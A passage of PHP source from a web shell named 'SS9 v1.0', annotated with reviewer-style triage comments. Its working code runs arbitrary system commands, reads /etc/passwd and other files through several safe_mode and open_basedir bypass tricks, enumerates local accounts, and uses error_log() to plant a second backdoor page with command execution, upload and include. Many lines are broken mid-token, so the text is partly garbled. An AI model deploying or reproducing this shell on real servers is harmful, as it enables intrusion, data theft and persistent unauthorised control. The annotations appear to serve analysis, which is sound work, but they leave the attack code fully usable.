// this part of the file. On a compromised host this is typically how stored
// secrets (passwords, keys) are located, so treat credentials in readable
// files as exposed.
if ($_GET['act'] == 'search')
{
if ($_GET['do'] == 'search')
{
// The optional third argument is the file-name mask, passed only when the
// 'mask' checkbox is ticked and a mask was entered.
if ($_POST['mask'] == '1' and !empty($_POST['searchmask'
]))
{
$SR = new SearchResult($_POST['searchdir'],$_POS
T['searchtext'],$_POST['searchmask']);
}
else
{
$SR = new SearchResult($_POST['searchdir'],$_POS
T['searchtext']);
}
$SR->SearchText(0,0);
$res = $SR->GetResultFiles();
$found = $SR->GetMatchesCount();
// $titles is fetched but not used in the visible code.
$titles = $SR->GetTitles();
$result = css();
if ($found > 0)
{
// Build a standalone HTML page: one heading row per file, then one small
// table per entry of that file's result array.
$result .= "\n" . '<html dir="ltr">' . "\n" . '<
head>' . "\n" . css() . "\n" . '<title>SS9 v1.0 - Search</title>' . "\n" . '</he
ad>' . "\n" . '<body bgcolor="#000000"><center>' . "\n" . '<table width="775" bo

rder="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">' . "\n";


foreach($res as $file=>$v)
{
$result .= '<tr class="top">' . "\n";
// The path is shown with forward slashes replaced by backslashes.
$result .= '<td align="left"><table widt
h="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>:> <b>' . str_replace
("/","\\",$file) . "</b></td></tr></table></td>\n";
$result .= '</tr>' . "\n" . '<tr class="
secondalt">' . "\n" . '<td align="center">' . "\n";
// $a and $b are written into the page as returned by SearchResult;
// no escaping is applied here.
foreach($v as $a=>$b)
{
$result .= '<table width="98%" b
order="1" cellpadding="0" cellspacing="0">' . "\n";
$result .= "<tr>\n";
$result .= '<td width="5%">' . $
a . "</td>\n";
$result .= '<td width="95%"> ' .
$b . "</td>\n";
$result .= "</tr>\n";
$result .= "</table>\n";
}
}
$result .= "</table></td></tr></table></center><
/body></html>";
print($result);
exit;
}
else
{
doheader();
msg('Sorry, Don\'t exists any result.');
dofooter();
exit;
}
}
// No query submitted: render the search form, pre-filled with the current
// working directory and a default mask of ".txt;.php".
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center" colspan="2">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Search text in files:</b></td></tr></table>
</td>
</tr>
<form action="' . $REQUEST_URI . '?act=search&do=search" method="POST">
<tr class="secondalt">
<td width="10%">Search text:</td>
<td width="90%"><input type="text" name="searchtext" class="inpu
t" size="40"></td>
</tr>
<tr class="secondalt">
<td>Search dir:</td>
<td><input type="text" name="searchdir" class="input" value="' .
$pwd . '" size="40"></td>
</tr>
<tr class="secondalt">
<td>Only in files:</td>

<td><input type="checkbox" name="mask" value="1"> <input type="t


ext" name="searchmask" class="input" value=".txt;.php" size="40"></td>
</tr>
<tr class="secondalt">
<td align="center" colspan="2"><input type="submit" class="input
" name="submit" value="Search"></td>
</tr>
</table>');
dofooter();
exit;
}
############## Make directory ################
// ?act=mkdir: creates a directory named by POST 'newdirectory' beneath the
// process working directory ($pwd). The name is concatenated as-is, so path
// separators in it are not filtered.
if ($_GET['act'] == 'mkdir')
{
doheader();
if (!empty($_POST['newdirectory']))
{
$mkdir = $pwd . "/" . $_POST['newdirectory'];
if (is_dir($mkdir))
{
msg("Sorry, I exists this directory.");
goto($REQUEST_URI . '?');
}
else
{
// The directory is created with mode 0777 and then chmod-ed to 0777 again,
// i.e. world-writable regardless of umask. World-writable directories
// created by the web server account are worth flagging in a sweep.
if (mkdir($mkdir,0777))
{
msg('Successfully make directory [' . $m
kdir . '].');
@chmod($mkdir,0777);
goto($REQUEST_URI . '?');
}
else
{
msg("Can't make directory.");
goto($REQUEST_URI . '?');
}
}
}
else
{
msg("Sorry, You don't write directory name.");
goto($REQUEST_URI . '?');
}
dofooter();
exit;
}
############### Delete Dir ###################
// ?act=deldir: removes the directory named in GET 'dirpath'. rmdir() only
// succeeds on an empty directory; `@` hides the warning otherwise. The path is
// taken from the request without restriction.
if ($_GET['act'] == 'deldir')
{
doheader();
if (@rmdir($_GET['dirpath']))
{
msg('Successfully deleted!');
goto($REQUEST_URI . '?');
}
else
{

msg('Sorry,don\'t deleted!');
goto($REQUEST_URI . '?');
}
dofooter();
exit;
}
################ File Manager ################
if (!isset($_GET['act']))
{
doheader();
$pathname = str_replace('\\','/',dirname(__FILE__));
if (!isset($_GET['dir']) or empty($_GET['dir']))
{
$dir = ".";
$nowpath = getPath($pathname, $dir);
}
else
{
$dir = $_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
$tb->tableheader();
echo"<tr class='top'><td align='center' nowrap width='45%'><b>DI
R</b></td><td align='center' nowrap width='10%'><b>First Modify</b></td><td alig
n='center' nowrap width='10%'><b>Last Modify</b></td><td align='center' nowrap w
idth='10%'><b>Size</b></td><td align='center' nowrap width='10%'><b>Edit</b></td
><td align='center' nowrap width='10%'><b>Delete</b></td><td align='center' nowr
ap width='5%'><b>Perm</b></td></tr>";
$dirs = @opendir($dir);
$dir_i = 0;
while ($file = @readdir($dirs))
{
$filepath = $dir . "/" . $file;
$a = @is_dir($filepath);
if($a == "1")
{
if($file != ".." and $file != ".")
{
$ctime = @date("Y-m-d H:i:s",@filectim
e($filepath));
$mtime

= @date("Y-m-d H:i:s",@filemtim

e($filepath));
$dirperm = substr(base_convert(fileperms
($filepath),10,8),-4);
$dirperm = (substr($dirperm,1,3) == 777
or 666) ? '<font color="green">' . $dirperm . '</font>' : $dirperm;
print('<tr class="' . getrowbg() . '">')
;
echo " <td style=\"padding-left: 5px;\"
>[<a href=\"?dir=" . $dir . "/" . urlencode($file) . "\">" . $file . "</a>]</td>
";
print(' <td align="center" nowrap class
="smlfont"><span class="ccfont">' . $ctime . '</span></td>');
print(' <td align="center" nowrap class
="smlfont"><span class="ccfont">' . $mtime . '</span></td>');

print(' <td align="center" nowrap class


="smlfont"><span class="ccfont">&lt;DIR&gt;</span></td>');
print(' <td align="center" nowrap class
="smlfont"><span class="ccfont">&lt;DIR&gt;</span></td>');
print(' <td align="center" nowrap class
="smlfont"><span class="ccfont"><a href="' . $REQUEST_URI . '?act=deldir&dirpath
=' . $nowpath . '/' . $file . '">[Delete]</a></span></td>');
print(' <td align="center" nowrap class
="smlfont"><span class="ccfont">' . $dirperm . '</span></td>');
print("</tr>");
$dir_i++;
}
else
{
if($file == "..")
{
print("<tr class=" . getrowbg()
. ">");
print(' <td nowrap colspan="7"
style="padding-left: 5px;"><a href="' . $REQUEST_URI . '?dir=' . $dir . '/' . ur
lencode($file) . '">Up Dir</a> You are here[' . $nowpath . ']</td>');
print("</tr>");
}
}
}
}
@closedir($dirs);
print("<tr bgcolor='#cccccc'><td colspan='6' height='5'></td></t
r><FORM method='POST'>");
$dirs = @opendir($dir);
$file_i = 0;
while ($file = @readdir($dirs))
{
$filepath = $dir . "/" . $file;
$a = @is_dir($filepath);
if($a == "0")
{
$size = @size($filepath);
if (@filectime($filepath) == @filemtime($filepat
h))
{
$ctime = @date("Y-m-d H:i:s",@filectime(
$filepath));
$mtime = @date("Y-m-d H:i:s",@filemtime(
$filepath));
}
else
{
$ctime = '<span class="redfont">' . @dat
e("Y-m-d H:i:s",@filectime($filepath)) . "</span>";
$mtime = '<span class="redfont">' . @dat
e("Y-m-d H:i:s",@filemtime($filepath)) . "</span>";
}
$fileperm = substr(base_convert(@fileperms($file
path),10,8),-4);
$fileperm = (substr($fileperm,1,3) == 777 or 666
) ? '<font color="green">' . $fileperm . '</font>' : $fileperm;

print('<tr class="' . getrowbg() . '">');


print(' <td style="padding-left: 5px;">');
print('&gt; ');
if (in_array($file, $danger_files))
{
print('<a href="' . $filepath . '" targe
t="_blank"><font color="yellow"><b>' . $file . '</b></font></a></td>');
}
else
{
print('<a href="' . $filepath . '" targe
t="_blank">' . $file . '</a></td>');
}
print(' <td align="center" nowrap class="smlfon
t"><span class="ccfont">' . $ctime . '</span></td>');
print(' <td align="center" nowrap class="smlfon
t"><span class="ccfont">' . $mtime . '</span></td>');
print(' <td align="left" nowrap class="smlfont"
><span class="ccfont">&nbsp;' . $size . '</span></td>');
print(' <td align="center" nowrap class="smlfon
t"><span class="ccfont"><a href="' . $REQUEST_URI . '?act=editfile&file=' . $fil
e . '">[Edit]</a></span></td>');
print(' <td align="center" nowrap class="smlfon
t"><span class="ccfont"><a href="' . $REQUEST_URI . '?act=delfile&file=' . $file
. '&pwd=' . $nowpath . '">[Delete]</a></span></td>');
print(' <td align="center" nowrap class="smlfon
t"><span class="ccfont">' . $fileperm . '</span></td>');
print("</tr>");
$file_i++;
}
}
@closedir($dirs);
print("</FORM>");
$tb->tablefooter();
############## Exploits and execute ##########
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'
system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'
=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'pa
ssthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
$tb->tableheader();
print('<tr class="top"><td><b>Exploits and execution :</b></td><
/tr>');
$tb->tdbody('<table width="100%" border="0" cellpadding="3" cell
spacing="2"><tr>');
$tb->headerform1(array('action'=>'?act=cmd','content'=>$tb->td('
:: Execution Commands ::<br>' . $tb->makeselect(array('name'=>'execfunc','option
'=>$execfuncs,'selected'=>$execfunc)) . ' ' . $tb->makeinput('command') . ' ' .
$tb->makeinput('Run','Run','','submit'))));
$tb->headerform1(array('action'=>'?act=readsql','content'=>$tb->
td(':: Read file with [SQL] ::<br>' . $tb->makeinput('sql','/etc/passwd') . '&nb
sp;' . $tb->makeinput('','Read','sql','submit'))));
print("</tr><tr>");
$tb->headerform1(array('action'=>'?act=curl','content'=>$tb->td(
':: Read file with [CURL] ::<br>' . $tb->makeinput('curl','/etc/passwd') . '&nbs
p;' . $tb->makeinput('','Read','curl','submit'))));
$tb->headerform1(array('action'=>'?act=copy','content'=>$tb->td(
':: Read file with [copy] ::<br>' . $tb->makeinput('copy','/etc/passwd') . '&nbs

p;' . $tb->makeinput('','Read','copy','submit'))));
print("</tr><tr>");
$tb->headerform1(array('action'=>'?act=ini_restore','content'=>$
tb->td(':: Read file with [ini_restore] ::<br>' . $tb->makeinput('file','/etc/pa
sswd') . '&nbsp;' . $tb->makeinput('','Read','M2','submit'))));
$tb->headerform1(array('action'=>'?act=imap','content'=>$tb->td(
':: Read file or dir with [imap] ::<br>' . $tb->makeimp('switch','/etc/passwd')
. '&nbsp;' . $tb->makeinput('string','/etc/passwd' ) . '&nbsp;' . $tb->makeinput
('string','Read','','submit'))));
print("</tr><tr>");
$tb->headerform1(array('action'=>'?act=id','content'=>$tb->td(':
: Read file with [id] ::<br>' . $tb->makeid('plugin','cat /etc/passwd') . '&nbsp
;' . $tb->makeinput('','Read','plugin','submit'))));
$tb->headerform1(array('action'=>'?act=error','content'=>$tb->td
(':: Make file with [ERORR] ::<br>' . $tb->makeinput('ER','error.php') . '&nbsp;
' . $tb->makeinput('','Write','ER','submit'))));
print("</tr><tr>");
$tb->headerform1(array('action'=>'?act=upload&dir=' . urlencode(
$dir),'enctype'=>'multipart/form-data','content'=>$tb->td(':: Upload file ::<br>
'.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','Uploa
d','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))));
$tb->headerform1(array('action'=>'?act=mkdir','content'=>$tb->td
(':: Make directory ::<br>'.$tb->makeinput('newdirectory').' '.$tb->makeinput('c
reatedirectory','Make directory','','submit'))));
print("</tr><tr>");
$tb->headerform1(array('action'=>'?act=download','content'=>$tb>td(':: Download file ::<br>'.$tb->makeinput('downname',$nowpath,'','text',40).'
<br>'.$tb->makeinput('compress','none','checked','radio','','').' without archiv
e '.((@function_exists('gzcompress')) ? $tb->makeinput('compress','zip','','radi
o','','').' zip' : '').' '.((@function_exists('gzencode')) ? $tb->makeinput('com
press','gzip','','radio','','').' gzip': '').' '.((@function_exists('bzcompress'
)) ? $tb->makeinput('compress','bzip','','radio','','').' bzip' : '').'<br>'.$tb
->makeinput('download','Download','','submit'))));
$tb->headerform1(array('action'=>'?act=rename','content'=>$tb->t
d(':: Rename file ::<br>'.$tb->makeinput('oldname','Old name','','','15').' '.$t
b->makeinput('newname','New name','','','15').' '.$tb->makeinput('renamefile','R
ename','','submit'))));
print('</table></table>');
dofooter();
}
################# Start Bugs #################
############### Read File SQL() ##############
// Handler for ?act=readsql. What the visible code does, for triage:
// - takes a filesystem path from $_POST['sql'] and prints it, unescaped, in
//   the page heading;
// - concatenates the same value, unescaped, into a LOAD DATA LOCAL INFILE
//   statement, so the file is read by the MySQL client code and then
//   selected back out of a temporary table named 'A' followed by time();
// - prints the first row through htmlspecialchars() inside a <textarea>.
// NOTE(review): presumably chosen because this read does not go through
// PHP's own file functions; confirm against the PHP/MySQL builds in scope.
// Review points: LOCAL loads are governed by the MySQL local_infile setting;
// the marker text __THIS_NEVER_HAPPENS__ and the short-lived 'A<timestamp>'
// tables are what this handler leaves in query logs.
if ($_GET['act'] == 'readsql')
{
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read file [SQL]: ' . $_POST['sql'] . '</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);

// Request-controlled path; no validation before it reaches the SQL text.
$file = $_POST['sql'];
// $mysql_files_str / $mysql_files are assigned but never read in this block.
$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/
etc/proftpd.conf";
$mysql_files = explode(':', $mysql_files_str);
// Four statements run in order: select DB, create temp table, load the file
// as one LONGBLOB value, read it back.
$sql = array("USE " . $mysql['db'], 'CREATE TEMPORARY TABLE ' .
($tbl = 'A' . time()) . ' (a LONGBLOB)', "LOAD DATA LOCAL INFILE '" . $file . "'
INTO TABLE " . $tbl . " FIELDS " . "TERMINATED BY
'__THIS_NEVER_HAPPENS__
' " . "ESCAPED BY
'' " . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'"
, "SELECT a FROM " . $tbl . " LIMIT 1");
// Credentials come from the $mysql[] settings at the top of the file.
mysql_connect($mysql['host'], $mysql['user'], $mysql['pass']);
foreach ($sql as $statement)
{
$q = mysql_query($statement);
// On failure the full statement and the server error are sent to the client.
if ($q == false) die ("FAILED: " . $statement . "REASON:
" . mysql_error());
// Statements without a result row are skipped; only the SELECT prints.
if (!$r = @mysql_fetch_array($q, MYSQL_NUM)) continue;
echo htmlspecialchars($r[0]);
mysql_free_result($q);
}
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}
#################### ERROR ###################
// Handler for ?act=error. What the visible code does, for triage:
// - error_log() is called with message type 3, which appends the message to
//   the file named by the third argument; the destination is $_POST['ER'];
// - the "message" is a complete HTML/PHP page, so one request leaves a new
//   script at a caller-chosen path;
// - the written page takes an uploaded file, a command string (passed to
//   system()) and an include path from POST.
// Review points: files containing the title string
// 'SS9 v1.0 [exploit error_log()]'; whether the web-server account can
// create files under the document root; whether error_log is listed in
// disable_functions on hosts that do not need it.
if ($_GET['act'] == 'error')
{
doheader();
// Destination path, taken from the request without validation.
$ERORR = $_POST['ER'];
// print() shows error_log()'s boolean result, not the written content.
print(error_log('<html>
<head>
<title>SS9 v1.0 [exploit error_log()]</title>
</head>
<body bgcolor="#000000">
<center>
<table Width="100%" height="10%" bgcolor="#222222" border="1">
<tr>
<td><center><font size="6" color="#cccccc">Exploit error_log() function</font></
center></td>
</tr>
</table>
<font color="#FF0000">
<?
if (isset($_POST["fileup"]))
{
$path = exec("pwd");
$path .= "/" . $fileup_name;
if (copy($fileup,$path))
{

print("Successfully upload file.");


}
else
{
print("Sorry, don\'t upload file.");
}
}
if (isset($_POST["cmd"]) and !empty($_POST["cmd"]))
{
$cmd = $_POST["cmd"];
print("<textarea>" . system($cmd) . "</textarea>");
}
if (isset($_POST["inc"]) and !empty($_POST["inc"]))
{
$inc = $_POST["inc"];
print include($inc);
}
?>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="fileup" size="20">
<input type="submit" value=" Upload ">
</form>
<form method="POST">
<input type="text" name="inc" size="20">
<input type="submit" value=" Include ">
</form>
<form method="POST" enctype="multipart/form-data" >
<input type="text" name="cmd" size="20">
<input type="submit" value=" Run ">
</form>
</center>
</body>
</html>', 3,$ERORR));
dofooter();
exit;
}
###################### id ####################
// Handler for ?act=id. Takes no request input: it asks posix_getpwuid() for
// every UID from 0 to 59999 and prints each returned field followed by ':'.
// The output is a list of local accounts assembled without opening any file.
// Review points: 60000 lookups per request; posix_getpwuid can be listed in
// disable_functions where the application does not need it.
// each() was removed in PHP 8, so the inner loop only runs on older versions.
if ($_GET['act'] == 'id')
{
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read file [id]:</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
for($uid = 0; $uid < 60000; $uid++)
{
$ara = posix_getpwuid($uid);

// UIDs with no account return an empty value and are skipped.
if (!empty($ara))
{
while (list ($key, $val) = each($ara))
{
// Values are printed unescaped, with no line break between accounts.
print($val . ":");
}
}
}
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}
#################### CURL ####################
// Handler for ?act=curl. What the visible code does, for triage:
// - builds a file:/// URL from $_POST['curl'], a NUL byte, a long run of
//   '../' segments and this script's own path (__FILE__);
// - runs the transfer twice; CURLOPT_RETURNTRANSFER is not set, so
//   curl_exec() writes the body straight to the response and var_dump()
//   only shows its boolean result.
// NOTE(review): the NUL-plus-own-path suffix presumably targets a path check
// in old PHP/cURL builds; confirm the affected versions before using this
// for scoping.
// Review points: request bodies carrying a 'curl' field with a local path;
// whether the cURL build on the host still enables the file protocol.
if ($_GET['act'] == 'curl')
{
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read file [CURL]:</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
// Request-controlled path, used without validation.
$curl = $_POST['curl'];
$ch = curl_init("file:///" . $curl . "\x00/../../../../../../../
../../../../../" . __FILE__);
// Output is not escaped before it lands inside the <textarea>.
curl_exec($ch);
var_dump(curl_exec($ch));
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}
#################### copy ####################
// Handler for ?act=copy. What the visible code does, for triage:
// - takes a path from $_POST['copy'];
// - creates a temp file with prefix 'cx' (tempnam with an empty directory
//   argument) before any check is made;
// - if the path exists, copies it through the compress.zlib:// stream
//   wrapper into the temp file, prints the temp file through
//   htmlspecialchars() and unlinks it.
// NOTE(review): going through the wrapper presumably targets old builds
// where wrapper reads were checked differently from plain paths; confirm.
// Review points: the temp file is removed only on the success path, so
// stray zero-length 'cx*' files in the temp directory mark failed attempts.
// goto() below is this file's own redirect helper; 'goto' has been a
// reserved word since PHP 5.3, so these calls only parse on older versions.
if ($_GET['act'] == 'copy')
{
// Request-controlled path, used without validation.
$copy = $_POST['copy'];
$temp = tempnam("", "cx");
if (file_exists($copy))
{
if (copy("compress.zlib://" . $copy, $temp))
{
doheader();

print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read file [copy]:</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
$fp = fopen($temp, "r");
$fr = fread($fp, filesize($temp));
fclose($fp);
print(htmlspecialchars($fr));
unlink($temp);
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}
else
{
// Copy failed: message only; $temp is left on disk.
doheader();
msg('Sorry, File <B>' . htmlspecialchars($copy)
. '</B> you don\'t have access to it.');
goto($REQUEST_URI . '?');
dofooter();
exit;
}
}
else
{
// Path does not exist: message only; $temp is left on disk.
doheader();
msg('Sorry, File <B>' . htmlspecialchars($copy) . '</B>
dosen\'t exists.');
goto($REQUEST_URI . '?');
dofooter();
exit;
}
}
################ ini_restore #################
// Handler for ?act=ini_restore. What the visible code does, for triage:
// - prints the current safe_mode and open_basedir values;
// - calls readfile() on $_POST['file'];
// - calls ini_restore() on both directives, prints their values again and
//   calls readfile() a second time.
// readfile() writes the file to the response itself and returns a byte
// count, so the final print shows that count after the content.
// NOTE(review): presumably targets old builds where ini_restore() could
// drop a per-directory restriction; confirm the affected versions.
// Review points: ini_restore can be listed in disable_functions; output is
// not escaped before it lands inside the <textarea>.
if ($_GET['act'] == 'ini_restore')
{
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read file [ini_restore]:</b></td></tr></table>
</td>

</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
// Request-controlled path, used without validation.
$file = $_POST['file'];
print(fetch_env("safe_mode"));
print(fetch_env("open_basedir"));
$s = readfile($file);
ini_restore("safe_mode");
ini_restore("open_basedir");
print(fetch_env("safe_mode"));
print(fetch_env("open_basedir"));
print $s = readfile($file);
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}
#################### imap ####################
// Handler for ?act=imap. What the visible code does, for triage:
// - 'file' mode passes $_POST['string'] to imap_open() as the mailbox name
//   and prints the body of message 1;
// - 'dir' mode opens a hard-coded local path as the mailbox, splits
//   $_POST['string'] on '|' into a reference and an optional pattern, and
//   prints what imap_list() returns.
// In both modes a local filesystem path is handed to the IMAP extension in
// place of a mail server specification, and the result is printed unescaped.
// NOTE(review): presumably relies on the extension accepting local mailbox
// paths outside PHP's own file restrictions; confirm for the build in scope.
// Review points: remove the imap extension where the application does not
// use it; 'file' mode does not check the imap_open() result before use.
if ($_GET['act'] == 'imap')
{
// Missing or empty fields fall back to 0, which fails both mode checks.
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
if ($string and $switch == "file")
{
doheader();
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read file [imap]:</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
$stream = imap_open($string, "", "");
$str = imap_body($stream, 1);
if (!empty($str))
{
print("<pre>" . $str . "</pre>");
}
imap_close($stream);
print('</textarea>
</td>
</tr>

</table>');
dofooter();
exit;
}
elseif ($string and $switch == "dir")
{
doheader();
$stream = imap_open("/etc/passwd", "", "");
if ($stream == FALSE)
{
msg("Can't open imap stream");
dofooter();
exit;
}
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>Read dir [imap]:</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<textarea method="POST" cols="90" rows="30" wrar="off">'
);
// "reference|pattern"; the pattern defaults to "*" when no '|' is given.
$string = explode("|",$string);
if (count($string) > 1)
{
$dir_list = imap_list($stream, trim($string[0]),
trim($string[1]));
}
else
{
$dir_list = imap_list($stream, trim($string[0]),
"*");
}
print("<pre>");
for ($i = 0; $i < count($dir_list); $i++)
{
print($dir_list[$i] . "<p>&nbsp;</p>");
}
print("</pre>");
imap_close($stream);
print('</textarea>
</td>
</tr>
</table>');
dofooter();
exit;
}

}
############### Start Functions ##############
// Line-by-line text search over every file found under a list of
// directories. The constructor collects the file list through DirFilesR();
// SearchText() fills the result arrays that the Get*() accessors return.
// The search string is placed into a regular expression as-is, so regex
// metacharacters in it are interpreted by preg_match_all().
class SearchResult
{
    var $text;              // raw search string, split on spaces into alternatives
    var $FilesToSearch;     // paths collected by the constructor
    var $ResultFiles;       // [path][line number] => highlighted line
    var $FilesTotal;        // number of collected paths
    var $MatchesCount;      // matches over all files
    var $FileMatschesCount; // declared with this spelling; the code uses FileMatchesCount
    var $TimeStart;         // getmicrotime() value taken in the constructor
    var $TimeTotal;         // seconds spent, set at the end of SearchText()
    var $titles;            // initialised to an empty array and not written again here

    // $dir is a ';'-separated list of directories; $filter is handed to
    // DirFilesR() unchanged as its extension filter.
    function SearchResult($dir, $text, $filter = '')
    {
        $this->FilesToSearch = Array();
        foreach (@explode(";", $dir) as $root) {
            $this->FilesToSearch = @array_merge($this->FilesToSearch, DirFilesR($root, $filter));
        }
        $this->text = $text;
        $this->FilesTotal = @count($this->FilesToSearch);
        $this->TimeStart = getmicrotime();
        $this->MatchesCount = 0;
        $this->ResultFiles = Array();
        $this->FileMatchesCount = Array();
        $this->titles = Array();
    }

    function GetFilesTotal()
    {
        return $this->FilesTotal;
    }

    function GetTitles()
    {
        return $this->titles;
    }

    function GetTimeTotal()
    {
        return $this->TimeTotal;
    }

    function GetMatchesCount()
    {
        return $this->MatchesCount;
    }

    function GetFileMatchesCount()
    {
        return $this->FileMatchesCount;
    }

    function GetResultFiles()
    {
        return $this->ResultFiles;
    }

    // $phrase wraps every word in \b...\b; $case = 0 adds the 'i' modifier.
    function SearchText($phrase = 0, $case = 0)
    {
        $terms = @explode(' ', $this->text);
        if ($phrase) {
            foreach ($terms as $idx => $term) {
                $terms[$idx] = '\b' . $term . '\b';
            }
        }
        $pattern = "/" . '(' . @implode('|', $terms) . ')' . "/";
        if (!$case) {
            $pattern .= 'i';
        }

        foreach ($this->FilesToSearch as $filename) {
            $this->FileMatchesCount[$filename] = 0;
            $FileStrings = @file($filename) or @next;
            $lineTotal = @count($FileStrings);
            for ($lineIdx = 0; $lineIdx < $lineTotal; $lineIdx++) {
                // Tags are stripped before matching, so markup never matches.
                $line = @strip_tags(@Trim($FileStrings[$lineIdx]));
                $found = '';
                $hits = @preg_match_all($pattern, $line, $found);
                if (!$hits) {
                    continue;
                }
                // Results are keyed by 1-based line number.
                $this->ResultFiles[$filename][$lineIdx + 1] = @preg_replace(
                    $pattern,
                    '<font color="yellow"><b>\\1</b></font>',
                    $line
                );
                $this->MatchesCount += $hits;
                $this->FileMatchesCount[$filename] += $hits;
            }
        }
        $this->TimeTotal = @round(getmicrotime() - $this->TimeStart, 4);
    }
}
// Current Unix time in seconds as a float, built from the two fields of the
// "usec sec" string that microtime() returns.
function getmicrotime()
{
    $fields = @explode(" ", @microtime());
    $fraction = (float)$fields[0];
    $seconds = (float)$fields[1];
    return ($fraction + $seconds);
}
// Recursively lists the files below $dir as "$dir/name" paths.
// $types is an optional ';'-separated list of extensions including the dot
// (for example ".php;.txt"); when it is empty every file is returned.
// A directory that cannot be opened contributes nothing; errors are silenced.
function DirFilesR($dir, $types = '')
{
    $found = Array();
    $handle = @opendir($dir);
    if (!$handle) {
        return $found;
    }
    while (false !== ($entry = @readdir($handle))) {
        if ($entry == "." || $entry == "..") {
            continue;
        }
        $full = $dir . "/" . $entry;
        if (@is_dir($full)) {
            $found = @array_merge($found, DirFilesR($full, $types));
            continue;
        }
        // Extension = text from the last dot to the end of the name.
        $dot = @strrpos($entry, ".");
        $ext = @substr($entry, $dot, @strlen($entry) - $dot);
        if (!$types || @in_array($ext, explode(';', $types))) {
            $found[] = $full;
        }
    }
    @closedir($handle);
    return $found;
}
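// In-memory ZIP archive writer: addFile() deflates one entry and records its
// local header and central-directory record, file() returns the finished
// archive as a string. Needs the zlib extension (gzcompress).
//
// The listing's property initialisers and the $fr assignments were scrambled
// by text extraction; they are restored here in statement order. The DOS
// timestamp is now packed with pack('V') instead of being assembled as hex
// escapes and run through eval(), which also mis-indexed the hex string when
// it had fewer than eight digits (dates clamped to 1980).
class zipfile
{
    // Local file header + compressed data, one string per entry.
    var $datasec = array();
    // Central-directory record, one string per entry.
    var $ctrl_dir = array();
    // End-of-central-directory signature followed by the two disk-number fields.
    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
    // Byte offset at which the next local header will start.
    var $old_offset = 0;

    // Converts a Unix timestamp (0 = now) to the packed 32-bit DOS date/time.
    // Dates before 1980 are clamped to 1980-01-01 00:00:00.
    function unix2DosTime($unixtime = 0)
    {
        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
        if ($timearray['year'] < 1980) {
            $timearray['year'] = 1980;
            $timearray['mon'] = 1;
            $timearray['mday'] = 1;
            $timearray['hours'] = 0;
            $timearray['minutes'] = 0;
            $timearray['seconds'] = 0;
        }
        return (($timearray['year'] - 1980) << 25)
            | ($timearray['mon'] << 21)
            | ($timearray['mday'] << 16)
            | ($timearray['hours'] << 11)
            | ($timearray['minutes'] << 5)
            | ($timearray['seconds'] >> 1);
    }

    // Adds one entry. $data is the uncompressed content, $name the path
    // inside the archive (backslashes become '/'), $time a Unix timestamp.
    function addFile($data, $name, $time = 0)
    {
        $name = str_replace('\\', '/', $name);
        // Four bytes, little-endian, as the ZIP headers expect.
        $hexdtime = pack('V', $this->unix2DosTime($time));

        $fr = "\x50\x4b\x03\x04"; // local file header signature
        $fr .= "\x14\x00";        // version needed to extract
        $fr .= "\x00\x00";        // general purpose flags
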